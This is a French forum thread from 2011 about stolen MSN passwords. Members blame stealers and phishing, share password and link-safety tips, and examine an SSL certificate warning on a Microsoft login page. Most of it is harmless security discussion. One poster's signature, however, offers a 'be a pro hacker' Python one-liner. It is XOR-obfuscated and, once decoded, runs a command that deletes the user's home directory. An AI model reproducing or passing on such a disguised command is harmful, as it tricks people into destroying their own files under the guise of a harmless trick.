Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 27-10-2011 18:51:13

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Piratage msn

Avis aux utilisateurs sur msn ayant un mot de passe classique du genre nom, date, couleur etc changez immédiatement de mot de passe pour un truc du genre qui veut rien dire comme par exemple: $2dRt6

Apparemment des malins s'amusent a voler les mdp de compte msn pour envoyer des messages de pubs via ces comptes, c'est arrivé a des gens que je connais très récemment.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 27-10-2011 18:56:21

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Piratage msn

Les serveurs de messagerie msn ne sont pas protégés contre les attaque dico / bruteforce? Tu es sur?

Hors Ligne

#3 27-10-2011 19:00:55

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Piratage msn

Si mais apparemment ils ont réussi a trouver une faille, en 2 jours c'est arrivé a 3 personnes que je connais.

Hors Ligne

#4 27-10-2011 20:19:54

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Piratage msn

Ils ne se sont pas plutot pris un stealer / trojan, ou bien un coup de phishing sans s'en rendre compte?

Hors Ligne

#5 27-10-2011 20:56:41

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Piratage msn

Possible pour le stealer oui, ça tient la route car une fois le mdp de l'un obtenu ça a tourné sur les msn qu'il avait en contact, tu as raison ça doit etre ça wink

Hors Ligne

#6 27-10-2011 21:03:30

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Piratage msn

Ca me parait plus probable, si tous les comptes msn avec un password faible se retrouvaient hackés du jour au lendemain ça en ferait un sacret paquet et on en entendrait parler jusqu'au journal de 20h big_smile

Hors Ligne

#7 27-10-2011 21:13:49

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Piratage msn

C'est sur, en tout cas si ça arrive un jour ça serait bien hilarant pour les mec de microsoft lol

Hors Ligne

#8 27-10-2011 23:14:38

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Piratage msn

Oui ça me parait très peut probable qu'on ait pu rendre les serveurs Msn vulnérables à un tel niveau, comme dit M1ck3y ça aurait fait la une des médias, d'autant plus je pense que les mdp sont hashés.

Hors Ligne

#9 27-10-2011 23:25:04

algerino
Membre d'Or
Inscription : 12-02-2010
Messages : 409

Re : Piratage msn

Moi je pense plutôt aux phishings qui sont d’ailleurs très répandues !


Le silence est une sagesse mais rare sont ceux qui le pratiquent by Prophète Mohammed (saws)

Hors Ligne

#10 28-10-2011 07:10:09

coyotus
Membre Irremplaçable
Lieu : fort fort lointain
Inscription : 05-08-2010
Messages : 884

Re : Piratage msn

Le plus courent dans ce genre de cas est que le stealer se propage de lui même via un mail contenant un lien piège,
je ne compte plus les id heu les personnes ayant peu de connaissances en matière d'infection qui ont cliqué sur un lien dans leurs client de messagerie.

Il y a plusieurs règle à respecter pour l'usage de Windows Live Messenger
1 ne jamais ouvrir de lien sur un mail en anglais alors que votre contact est francophone.
2 ne jamais croire si votre contact à trouvé un lien qui indique qui pourrais vous bloquer.
3 demander si votre contact vous a vraiment envoyé un lien pour vous inscrire sur un site social.
4 changer de mot de passe régulièrement.
5 prévenir vos contact d'une possible infection en cas d'envois de mail suspect.

Il faut savoir que le protocole SMTP ne permet pas d'autentification, en effet créer en 1982 avant l'explosion d'internet, on ignorait encore l'impacte du mail à cette époque.
Résultat via le port 25 il est possible d'envoyer très facilement des mail spoofé (at facebook dot com par exemple) et de berner les victimes avec un peu de social engeneering.

PS: j'oubliais ne jamais croire les hoax ni renvoyer les chaînes d'amitié qui ne servent qu'a faire circuler la liste de vos contact de mail en mail.

Dernière modification par coyotus (28-10-2011 07:11:57)


1310812721.gif

Hors Ligne

#11 28-10-2011 12:37:37

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Piratage msn

Ça va etre utile pour certains je pense, merci coyotus pour ces petites explications smile

Hors Ligne

#12 17-11-2011 14:00:37

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Piratage msn

Je reviens aujourd'hui déterrer ce sujet car j'ai un petit souci concernant msn, avant hier je me connecte a mes mail et je coche la case "maintenir la connexion" je reviens hier sur ma boite mail et a 2 reprise chrome m'a afficher une erreur de certificat SSL sur fond rouge, je vous montre pas l'image je pense que vous savez a quoi ça ressemble tongue

Je me suis donc déconnecter et aujourd'hui je me connecte, meme erreur et le joli cadenas avec "Microsoft corporation" écrit sur fond vert a disparu sur la page de login, pourtant j'ai vérifier la page est bien https.

Je suis connecter en filaire mais faut que je fasse ma petite enquête quand j'aurais plus de temps car c'est "étrange".

Hors Ligne

#13 17-11-2011 14:06:34

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Piratage msn

Affiche les détails du certificat (si tu es sur Chrome : clic droit > Afficher les infos sur la page > Informations relatives au certificat), regarde pour et par qui il a été émis, les dates de validité, etc...
S'il y a un truc louche, ne lui fais pas confiance (mets un screenshot ici si tu as un doute).

Avec un autre navigateur, le problème est le même ? Si tu vas sur le même site via un Linux en mode Live (=> navigateur "vierge"), est-ce que tu as le même problème ? Le réseau à partir duquel tu te connectes, c'est le tien ?

Hors Ligne

#14 17-11-2011 14:10:30

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Piratage msn

Avec un autre navigateur, le problème est le même ? Si tu vas sur le même site via un Linux en mode Live (=> navigateur "vierge"), est-ce que tu as le même problème ? Le réseau à partir duquel tu te connectes, c'est le tien ?

C'est idem sous firefox, pour le mode live c'est une bonne idée je n'ai pas testé, je vais voir ça wink et oui c'est bien de ma freebox que je me connecte, ce qui est étonnant c'est que connecté d'ailleurs (hotspot ou chez un ami qui a free également) je n'ai pas ce problème.

Hors Ligne

#15 17-11-2011 14:33:34

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Piratage msn

L'erreur est la meme en live/USB j'ai changer mon mot de passe ici par précaution étant donner que c'est le meme que sur mon hotmail.

Hors Ligne

#16 17-11-2011 16:13:51

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Piratage msn

est-ce que tu met ton pc en veille entre le moment ou tu t'authentifie et le moment ou tu reviens ?
il y a des bugs à ce niveau je crois.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#17 17-11-2011 16:20:57

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Piratage msn

koala a écrit :

L'erreur est la meme en live/USB j'ai changer mon mot de passe ici par précaution étant donner que c'est le meme que sur mon hotmail.

Tu sais bien que c'est l'erreur à ne pas commettre, le même mot de passe pour (msn+google+facebook+crack-wifi+etc) si tu te fais choper c'est la maison du bon dieu.

Hors Ligne

#18 17-11-2011 19:20:45

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Piratage msn

Tu sais bien que c'est l'erreur à ne pas commettre, le même mot de passe pour (msn+google+facebook+crack-wifi+etc) si tu te fais choper c'est la maison du bon dieu.

Je te rassure j'ai 4 boites mail chez yahoo gmail hotmail et voila, et le mot de passe n'est pas le meme partout j'en ai 3 au total wink

Hors Ligne

#19 20-11-2011 21:32:01

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Piratage msn

Et voila qu'aujourd'hui ça me le refait, toujours sur mon hotmail.


capture1zh.png

Hors Ligne

#20 20-11-2011 21:53:26

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Piratage msn

Visiblement c'est Chrome qui n'accepte pas le certificat, signé PAR et POUR Microsoft hmm C'est vrai que normalement, le certificat est sensé être signé par une autorité indépendante, mais bon je pense que Microsoft peut quand même être considéré comme "tiers de confiance" (je parle juste pour le SSL là hein !).
D'après ce que j'ai lu, Microsoft ne respecterait pas exactement les standards en matière de certificat et c'est pour ça qu'ils se font jeter par Google et Firefox...

Le truc bizarre, c'est le site que tu utilises pour te connecter : https://login.secure.emea.msn.com
C'est la première fois que j'en entends parler, mais je confirme que j'ai le même "problème" que toi sur cette URL (Chromium 15.0, Archlinux 64 bits). Par contre, les empreintes SHA sont les mêmes que pour toi, donc tu n'es pas victime d'une attaque (ou alors je le suis aussi) wink

Utilise le site de login "classique" (https://login.live.com) à moins d'avoir une bonne raison de passer par ce portail EMEA.

Hors Ligne

#21 20-11-2011 22:21:24

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Piratage msn

mais bon je pense que Microsoft peut quand même être considéré comme "tiers de confiance" (je parle juste pour le SSL là hein !).

J'espère bien big_smile

Je vais prendre l'authentification classique tu as raison, faudra quand meme que je me enseigne sur le "EMEA".

Hors Ligne

#22 20-11-2011 22:45:37

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Piratage msn

EMEA c'est un acronyme courant pour dire "Europe - Middle East - Africa". C'est généralement utilisé par les grosses multinationales (à l'origine américaine mais maintenant c'est généralisé) pour parler de leurs divisions : Americas, EMEA & Asia par exemple wink

Ici apparemment c'est un serveur de login pour les européens, mais j'en avais jamais entendu parler, c'est bizarre que tu aies été envoyé dessus "automatiquement" hmm

Hors Ligne

#23 21-11-2011 00:07:04

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Piratage msn

Merci pour tes infos wink je comprends pas trop pourquoi je suis passé par la aussi, un beau jours ils se sont dit "tiens lui on va le faire passer par la"

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.029 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]